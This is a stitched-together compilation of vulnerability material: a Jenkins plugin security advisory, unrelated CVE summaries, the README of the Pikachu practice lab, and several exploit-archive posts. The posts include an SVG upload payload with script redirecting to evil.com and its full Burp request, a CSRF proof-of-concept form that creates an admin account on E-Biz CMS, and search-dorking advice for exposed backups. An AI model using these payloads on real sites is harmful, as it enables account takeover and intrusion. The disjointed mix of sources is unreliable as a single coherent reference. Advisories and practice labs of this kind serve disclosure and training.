A missing permission check in Jenkins Delphix Plugin 3.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Blue Ocean Plugin
*   Config File Provider Plugin
*   Delphix Plugin
*   Docker Swarm Plugin
*   Favorite View Plugin
*   Flaky Test Handler Plugin
*   Folders Plugin
*   Fortify Plugin
*   Gogs Plugin
*   Maven Artifact ChoiceListProvider (Nexus) Plugin
*   NodeJS Plugin
*   Shortcut Job Plugin
*   Tuleap Authentication Plugin

**Descriptions****CSRF vulnerability in Folders Plugin may approve unsandboxed scripts**

**SECURITY-3106 / CVE-2023-40336**  
**Severity (CVSS):** High  
**Affected plugin: cloudbees-folder**  
**Description:**

Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to copy an item, which could potentially automatically approve unsandboxed scripts and allow the execution of unsafe scripts.

An improvement added in Script Security Plugin 1265.va\_fb\_290b\_4b\_d34 and 1251.1253.v4e638b\_e3b\_221 prevents automatic approval of unsandboxed scripts when administrators copy jobs, significantly reducing the impact of this vulnerability.

Folders Plugin 6.848.ve3b\_fd7839a\_81 requires POST requests for the affected HTTP endpoint.

**CSRF vulnerability in Folders Plugin**

**SECURITY-3105 / CVE-2023-40337**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-folder**  
**Description:**

Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to copy a view inside a folder.

Folders Plugin 6.848.ve3b\_fd7839a\_81 requires POST requests for the affected HTTP endpoint.

**Information disclosure in Folders Plugin**

**SECURITY-3109 / CVE-2023-40338**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-folder**  
**Description:**

Folders Plugin displays an error message when attempting to access the Scan Organization Folder Log if no logs are available.

In Folders Plugin 6.846.v23698686f0f6 and earlier, this error message includes the absolute path of a log file, exposing information about the Jenkins controller file system.

Folders Plugin 6.848.ve3b\_fd7839a\_81 does not display the absolute path of a log file in the error message.

**Improper masking of credentials in Config File Provider Plugin**

**SECURITY-3090 / CVE-2023-40339**  
**Severity (CVSS):** Medium  
**Affected plugin: config-file-provider**  
**Description:**

Config File Provider Plugin 952.va\_544a\_6234b\_46 and earlier does not mask (i.e., replace with asterisks) credentials specified in configuration files when they’re written to the build log.

Config File Provider Plugin 953.v0432a\_802e4d2 masks credentials configured in configuration files if they appear in the build log.

**Improper masking of credentials in NodeJS Plugin**

**SECURITY-3196 / CVE-2023-40340**  
**Severity (CVSS):** Medium  
**Affected plugin: nodejs**  
**Description:**

NodeJS Plugin integrates with Config File Provider Plugin to specify custom NPM settings, including credentials for authentication, in a Npm config file.

NodeJS Plugin 1.6.0 and earlier does not properly mask (i.e., replace with asterisks) credentials specified in the Npm config file in Pipeline build logs.

NodeJS Plugin 1.6.0.1 masks credentials specified in the Npm config file in Pipeline build logs.

**CSRF vulnerability in Blue Ocean Plugin allows capturing credentials**

**SECURITY-3116 / CVE-2023-40341**  
**Severity (CVSS):** Medium  
**Affected plugin: blueocean**  
**Description:**

Blue Ocean Plugin 1.27.5 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to connect to an attacker-specified URL, capturing GitHub credentials associated with an attacker-specified job.

This issue is due to an incomplete fix of SECURITY-2502.

Blue Ocean Plugin 1.27.5.1 uses the configured SCM URL, instead of a user-specified URL provided as a parameter to the HTTP endpoint.

**CSRF vulnerability and missing permission checks in Fortify Plugin allow capturing credentials**

**SECURITY-3115 / CVE-2023-4301 (CSRF), CVE-2023-4302 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: fortify**  
**Description:**

Fortify Plugin 22.1.38 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Fortify Plugin 22.2.39 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**HTML injection vulnerability in Fortify Plugin**

**SECURITY-3140 / CVE-2023-4303**  
**Severity (CVSS):** Medium  
**Affected plugin: fortify**  
**Description:**

Fortify Plugin 22.1.38 and earlier does not escape the error message for a form validation method. This results in an HTML injection vulnerability.

Since Jenkins 2.275 and LTS 2.263.2, a security hardening for form validation responses prevents JavaScript execution, so no scripts can be injected.

Fortify Plugin 22.2.39 removes HTML tags from the error message.

**Stored XSS vulnerability in Flaky Test Handler Plugin**

**SECURITY-3223 / CVE-2023-40342**  
**Severity (CVSS):** High  
**Affected plugin: flaky-test-handler**  
**Description:**

Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents.

Flaky Test Handler Plugin 1.2.3 escapes JUnit test contents when showing them on the Jenkins UI.

**Non-constant time token comparison in Tuleap Authentication Plugin**

**SECURITY-3229 / CVE-2023-40343**  
**Severity (CVSS):** Low  
**Affected plugin: tuleap-oauth**  
**Description:**

Tuleap Authentication Plugin 1.1.20 and earlier does not use a constant-time comparison when checking whether two authentication tokens are equal.

This could potentially allow attackers to use statistical methods to obtain a valid authentication token.

Tuleap Authentication Plugin 1.1.21 uses a constant-time comparison when validating authentication tokens.

**Missing permission check in Delphix Plugin allows enumerating credentials IDs**

**SECURITY-3214 (1) / CVE-2023-40344**  
**Severity (CVSS):** Medium  
**Affected plugin: delphix**  
**Description:**

Delphix Plugin 3.0.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Delphix Plugin 3.0.3 requires the appropriate permissions.

**Exposure of system-scoped credentials in Delphix Plugin**

**SECURITY-3214 (2) / CVE-2023-40345**  
**Severity (CVSS):** Medium  
**Affected plugin: delphix**  
**Description:**

Delphix Plugin 3.0.2 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.

This allows attackers with Overall/Read permission to access and capture credentials they are not entitled to.

Delphix Plugin 3.0.3 defines the appropriate context for credentials lookup.

**Stored XSS vulnerability in Shortcut Job Plugin**

**SECURITY-3071 / CVE-2023-40346**  
**Severity (CVSS):** High  
**Affected plugin: shortcut-job**  
**Description:**

Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs.

Shortcut Job Plugin 0.5 escapes the shortcut redirection URL.

**Exposure of system-scoped credentials in Maven Artifact ChoiceListProvider (Nexus) Plugin**

**SECURITY-3153 / CVE-2023-40347**  
**Severity (CVSS):** Medium  
**Affected plugin: maven-artifact-choicelistprovider**  
**Description:**

Maven Artifact ChoiceListProvider (Nexus) Plugin 1.14 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.

This allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.

**Unsafe default behavior and information disclosure in Gogs Plugin webhook**

**SECURITY-2894 / CVE-2023-40348 (information disclosure), CVE-2023-40349 (insecure default)**  
**Severity (CVSS):** Medium  
**Affected plugin: gogs-webhook**  
**Description:**

Gogs Plugin provides a webhook endpoint at /gogs-webhook that can be used to trigger builds of jobs. In Gogs Plugin 1.0.15 and earlier, an option to specify a Gogs secret for this webhook is provided, but not enabled by default.

This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified job name.

Additionally, the output of the webhook endpoint includes whether a job corresponding to the attacker-specified job name exists, even if the attacker has no permission to access it.

**Stored XSS vulnerability in Docker Swarm Plugin**

**SECURITY-2811 / CVE-2023-40350**  
**Severity (CVSS):** High  
**Affected plugin: docker-swarm**  
**Description:**

Docker Swarm Plugin processes Docker responses to generate the Docker Swarm Dashboard view.

Docker Swarm Plugin 1.11 and earlier does not escape values returned from Docker before inserting them into the Docker Swarm Dashboard view. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control responses from Docker.

**CSRF vulnerability in Favorite View Plugin**

**SECURITY-3201 / CVE-2023-40351**  
**Severity (CVSS):** Medium  
**Affected plugin: favorite-view**  
**Description:**

Favorite View Plugin 5.v77a\_37f62782d and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to add or remove views from another user’s favorite views tab bar.

**Severity**

*   SECURITY-2811: High
*   SECURITY-2894: Medium
*   SECURITY-3071: High
*   SECURITY-3090: Medium
*   SECURITY-3105: Medium
*   SECURITY-3106: High
*   SECURITY-3109: Medium
*   SECURITY-3115: Medium
*   SECURITY-3116: Medium
*   SECURITY-3140: Medium
*   SECURITY-3153: Medium
*   SECURITY-3196: Medium
*   SECURITY-3201: Medium
*   SECURITY-3214 (1): Medium
*   SECURITY-3214 (2): Medium
*   SECURITY-3223: High
*   SECURITY-3229: Low

**Affected Versions**

*   **Blue Ocean Plugin** up to and including 1.27.5
*   **Config File Provider Plugin** up to and including 952.va\_544a\_6234b\_46
*   **Delphix Plugin** up to and including 3.0.2
*   **Docker Swarm Plugin** up to and including 1.11
*   **Favorite View Plugin** up to and including 5.v77a\_37f62782d
*   **Flaky Test Handler Plugin** up to and including 1.2.2
*   **Folders Plugin** up to and including 6.846.v23698686f0f6
*   **Fortify Plugin** up to and including 22.1.38
*   **Gogs Plugin** up to and including 1.0.15
*   **Maven Artifact ChoiceListProvider (Nexus) Plugin** up to and including 1.14
*   **NodeJS Plugin** up to and including 1.6.0
*   **Shortcut Job Plugin** up to and including 0.4
*   **Tuleap Authentication Plugin** up to and including 1.1.20

**Fix**

*   **Blue Ocean Plugin** should be updated to version 1.27.5.1
*   **Config File Provider Plugin** should be updated to version 953.v0432a\_802e4d2
*   **Delphix Plugin** should be updated to version 3.0.3
*   **Flaky Test Handler Plugin** should be updated to version 1.2.3
*   **Folders Plugin** should be updated to version 6.848.ve3b\_fd7839a\_81
*   **Fortify Plugin** should be updated to version 22.2.39
*   **NodeJS Plugin** should be updated to version 1.6.0.1
*   **Shortcut Job Plugin** should be updated to version 0.5
*   **Tuleap Authentication Plugin** should be updated to version 1.1.21

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Docker Swarm Plugin
*   Favorite View Plugin
*   Gogs Plugin
*   Maven Artifact ChoiceListProvider (Nexus) Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3116, SECURITY-3153
*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3201, SECURITY-3223
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-3214 (1), SECURITY-3214 (2)
*   **James Nord, CloudBees, Inc.** for SECURITY-3090, SECURITY-3196
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3071, SECURITY-3105, SECURITY-3106, SECURITY-3109, SECURITY-3140
*   **Kevin Guerroudj, CloudBees, Inc. and Valdes Che Zogou, CloudBees, Inc.** for SECURITY-2811
*   **Kevin Guerroudj, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3229
*   **Kevin Guerroudj, CloudBees, Inc. and, independently, Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3115
*   **anhnm99** for SECURITY-2894

CVE-2023-40344: Jenkins Security Advisory 2023-08-16

Jenkins Flaky Test Handler Plugin 1.2.2 and earlier does not escape JUnit test contents when showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control JUnit report file contents.

CVE-2023-40342: Jenkins Security Advisory 2023-08-16

A cross-site request forgery (CSRF) vulnerability in Jenkins Blue Ocean Plugin 1.27.5 and earlier allows attackers to connect to an attacker-specified URL, capturing GitHub credentials associated with an attacker-specified job.

CVE-2023-40341: Jenkins Security Advisory 2023-08-16

install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document.

#########################################################################################################################################  
# Exploit Title: Vulnerability in Campcodes Online Matrimonial Website  
System v3.3 allows code execution via malicious SVG file upload  
# Date: 3-8-2023  
# Vendor Homepage:  http://campcodes.com  
# Category: Web Application  
# Exploit Author: Rajdip Dey Sarkar  
# Version: 3.3  
# Tested on: Windows/Kali  
# CVE: CVE-2023-39115  
###########################################################################################################################################

Description:  
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial  
Website System Script v3.3 allows attackers to execute arbitrary code via  
uploading a crafted SVG file.

SVG Payload  
------------------

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert("You have been hacked!!")

      window.location.href="https://evil.com"  
   </script>  
</svg>

Steps to reproduce  
--------------------------

 -Login with your creds  
 -Navigate to this directory - /profile-settings  
 -Click on Gallery -> Add New Image -> Browser -> Add Files  
 -Choose the SVG file and upload done  
 -Click the image!! Payload Triggered

Burp Request  
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Content-Type: multipart/form-data;  
boundary=---------------------------167707198418121100152548123485  
Content-Length: 1044  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create  
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;  
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="relativePath"

null  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="name"

file (1).svg  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="type"

image/svg+xml  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert("You have been hacked!!")

      window.location.href="https://evil.com"  
   </script>  
</svg>  
-----------------------------167707198418121100152548123485--

CVE-2023-39115: Campcodes Online Matrimonial Website System 3.3 Cross Site Scripting ≈ Packet Storm

The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack

CVE-2023-2271

The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments

CVE-2023-0551

The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when creating and editing its shortcode, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

CVE-2023-0058

Pikachu v1.0 was discovered to contain a SQL injection vulnerability via the $username parameter at \inc\function.php.

    

“如果你想搞懂一个漏洞，比较好的方法是：你可以自己先制造出这个漏洞（用代码编写），然后再利用它，最后再修复它”。

  
\# pikachu

Pikachu是一个带有漏洞的Web应用系统，在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习，那么Pikachu可能正合你意。  

**Pikachu上的漏洞类型列表如下：  
**

*   Burt Force(暴力破解漏洞)  
    
*   XSS(跨站脚本漏洞)  
    
*   CSRF(跨站请求伪造)  
    
*   SQL-Inject(SQL注入漏洞)  
    
*   RCE(远程命令/代码执行)  
    
*   Files Inclusion(文件包含漏洞)  
    
*   Unsafe file downloads(不安全的文件下载)  
    
*   Unsafe file uploads(不安全的文件上传)  
    
*   Over Permisson(越权漏洞)  
    
*   ../../../(目录遍历)  
    
*   I can see your ABC(敏感信息泄露)  
    
*   PHP反序列化漏洞  
    
*   XXE(XML External Entity attack)  
    
*   不安全的URL重定向  
    
*   SSRF(Server-Side Request Forgery)  
    
*   管理工具  
    
*   More...(找找看?..有彩蛋!)  
    

管理工具里面提供了一个简易的xss管理后台,供你测试钓鱼和捞cookie,还可以搞键盘记录！~  
后续会持续更新一些新的漏洞进来,也欢迎你提交漏洞案例给我,最新版本请关注pikachu  
每类漏洞根据不同的情况又分别设计了不同的子类  
同时,为了让这些漏洞变的有意思一些,在Pikachu平台上为每个漏洞都设计了一些小的场景,点击漏洞页面右上角的"提示"可以查看到帮助信息。  

**如何安装和使用**

Pikachu使用世界上最好的语言PHP进行开发-\_-  
数据库使用的是mysql，因此运行Pikachu你需要提前安装好"PHP+MYSQL+中间件（如apache,nginx等）"的基础环境，建议在你的测试环境直接使用 一些集成软件来搭建这些基础环境,比如XAMPP,WAMP等,作为一个搞安全的人,这些东西对你来说应该不是什么难事。接下来:  
\-->把下载下来的pikachu文件夹放到web服务器根目录下;  
\-->根据实际情况修改inc/config.inc.php里面的数据库连接配置;  
\-->访问h ttp://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化，点击进行初始化安装!",点击即可完成安装。

如果阁下对Pikachu使用上有什么疑问，可以在QQ群：532078894（已满），973351978（未满） 咨询，虽然咨询了，也不一定有人回答-\_-。

**Docker**

使用已有构建：

docker run -d -p 8765:80 8023/pikachu-expect:latest

本地构建：

如果你熟悉docker,也可以直接用docker部署
docker build -t "pikachu" .
docker run -d -p 8080:80 pikachu

**切记**

"少就是多,慢就是快"

**WIKI**

点击进入

CVE-2023-39849: GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : E-Biz CMS v2.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : https://softech.pk/                                                                                                |    
| # Dork      : Copyright © 2019, Designed By SOFTECH                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

    <h1>Add User</h1>  
    </div>  
      
    <div class="site">  
      <div class="container">  
        <div class="grid-16">

                          <div class="widget" >  
            <div class="widget-header"> <span class="icon-wrench"></span>  
              <h3>Add User </h3>  
            </div>  
              
            <div class="widget-content">  
                
                
                
              <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
                <table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
                  <tr>  
                    <td width="527" align="left"><strong>Name : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Email :</strong> </td>  
                  </tr>  
                  <tr>  
                    <td><span class="field">  
                      <input name="email"  type="text" id="date"  class="validate[required,custom[email]" size="50" />  
                    </span></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Password :</strong></td>  
                  </tr>  
                  <tr>  
                    <td><div class="field">  
                    <input name="password"  type="text" id="date_English" class="validate[required]" size="50" />          
                  </div> </td>  
                  </tr>  
                  <tr>  
                    <td><strong>Access : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><select name="type" id="type" >  
                        <option value="user" selected="selected">User</option>  
                      <option value="admin">Admin</option>  
                    </select>                           </td>  
                  </tr>  
                  <tr id="link">  
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
                        <tr>  
                          <td height="30"><strong id="">Privileges:</strong></td>  
                        </tr>  
                        <tr>  
                          <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

                                                        <tr>  
                              <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
                                <tr>  
                                  <td height="25"><label for="label">Company News</label></td>  
                                  <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25">Home Banners</td>  
                                  <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Gallery</td>  
                                  <td><input type="checkbox" id="gal" name="gallery" value="Y"  onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25"><label for="sim">Simple Gallery</label></td>  
                                  <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y"  onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                                                                                                                                                                                                              <tr>  
                                  <td height="25">Pages</td>  
                                  <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Newsletter</td>  
                                  <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                                  <tr>  
                                  <td height="25">Categories</td>  
                                  <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                             </table>                                </td>  
                            </tr>

                                                      </table>                            </td>  
                        </tr>  
                      </table></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>

                                                      <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                </table>  
                </td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>                                          </td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td><button  name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

  <button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
                  </tr>  
                </table>  
              </form>  
            </div>

Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================

Tag

#csrf